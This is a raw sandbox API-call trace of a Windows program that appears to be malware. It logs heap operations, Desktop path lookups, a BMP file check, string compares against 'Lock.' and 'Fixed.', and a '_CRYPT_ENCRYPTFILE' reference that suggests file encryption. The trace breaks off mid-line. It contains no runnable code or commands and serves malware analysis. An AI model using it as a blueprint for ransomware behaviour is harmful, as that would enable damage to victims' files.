[0201.033] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0201.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0201.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0201.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0201.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0201.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0201.033] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0201.033] TranslateMessage (lpMsg=0x8cf968) returned 0 [0201.033] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0201.033] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0201.033] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0201.034] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0201.034] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0201.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0201.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0201.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0201.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0201.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0201.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0201.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e563a8 [0201.035] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/P52g8.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\P52g8.bmp", lpFilePart=0x8cf650*="P52g8.bmp") returned 0x21 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0201.035] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\P52g8.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\p52g8.bmp")) returned 0xffffffff [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0201.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0201.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0201.036] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0201.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0201.036] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0201.036] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0201.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0201.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0201.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0201.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0201.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCRepair_rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0201.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CRepair_rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Repair_rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0201.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="epair_rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pair_rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0201.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="air_rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ir_rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r_rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0201.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rkill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0201.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ill.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ll.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0201.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0201.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0201.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0201.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0201.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0201.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0201.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0201.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0201.037] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0201.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0201.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0201.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0201.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0201.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0201.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0201.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0201.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0201.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x977c68 [0201.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0201.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCRepair_rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CRepair_rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0201.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Repair_rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="epair_rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0201.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pair_rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="air_rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0201.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ir_rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r_rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0201.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rkill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ill.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ll.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0201.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0201.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0201.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0201.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0201.039] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0201.040] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0201.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0201.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0201.040] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0201.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0201.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0201.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0201.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0201.041] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0201.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53890 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0201.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0201.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0201.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0201.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0201.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0201.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0201.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0201.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0201.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0201.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 